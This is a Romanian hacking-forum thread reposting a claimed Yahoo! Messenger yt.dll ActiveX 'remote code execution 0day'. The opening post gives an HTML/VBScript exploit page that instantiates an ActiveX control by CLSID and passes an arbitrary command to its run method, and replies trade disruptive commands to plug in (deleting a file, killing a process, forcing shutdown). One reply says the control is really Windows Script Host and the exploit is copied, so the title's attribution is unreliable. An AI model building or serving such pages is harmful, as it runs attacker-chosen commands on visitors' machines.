Jump to content
Cheater

Yahoo! messenger (v10.0.0.525-us beta) yt.dll ActiveX Remote Code Execution 0day

Recommended Posts

Posted

##################################{In The Name Of Allah The Mercifull}######################

# Title : Yahoo! messenger (V 10.0.0.525-us)beta (yt.dll) 0day suffer from ActiveX Remote Code Execution

# Tested : Windows xp (sp3)

## Author : R3d-D3v!L <X[at]hotmail.co.jp> ##

# Credits to : XP10_HACKER ((XP10.ME-xp10.com))

## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ##

## all member at XP10.ME ##

########################################################

infected bath : Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll

reason of infected :


Function c (
ByVal bstr As String
) As String

in (C) in IYTHelpe

EXPLO!T:


<html>

</font></b></p>

<p>

<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'

></object>

<script language='vbscript'>



arg1="TYPE YOUR EXEcUT!ON CODE"



target.run arg1



</script></p>

sursa: Yahoo! messenger (v10.0.0.525-us beta) yt.dll ActiveX Remote Code Execution 0day

Posted

Eu am incercat pentru 10.0.0.1270

arg1="del test.tst"

si

arg1="del test.tst;"

Si niciun rezultat... E gresit ce-am scris eu sau clar nu e compatibil cu ultima versiune de Y!M?

Posted

Ce legatura are asta cu Yahoo! Messenger? E copiat de aici si e un "exploit" pentru IE(iti cere permisiunea daca vrei sa-l executi sau nu):

http://www.exploit-db.com/exploits/11457/

O sa fie sters in curand si de pe exploit-db, deocamdata e neverificat.

Posted

Da, e vorba de C:\Windows\system32\wshom.ocx, runtime de la Windows Script Host.

AlStar: "taskkill /IM winamp.exe /F"

De pe Internet Explorer, dai Allow la Blocked Content.

Posted

AlStar: "taskkill /IM winamp.exe /F"

De pe Internet Explorer, dai Allow la Blocked Content.

He He De unde ai stiut ca am Winampu' pornit?:))

Dar merge numa' taskkill? Oricum e naspa ca tre' sa dai allow, plus ca toti au auzit de Firefox si Opera..

Posted
He He De unde ai stiut ca am Winampu' pornit?:))

Dar merge numa' taskkill? Oricum e naspa ca tre' sa dai allow, plus ca toti au auzit de Firefox si Opera..

Merge orice:


cmd /c shutdown -s -t 00

+ Merge doar local, daca il uploadezi pe un host nu se intampla nimic.

Concluzie: Inutil!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...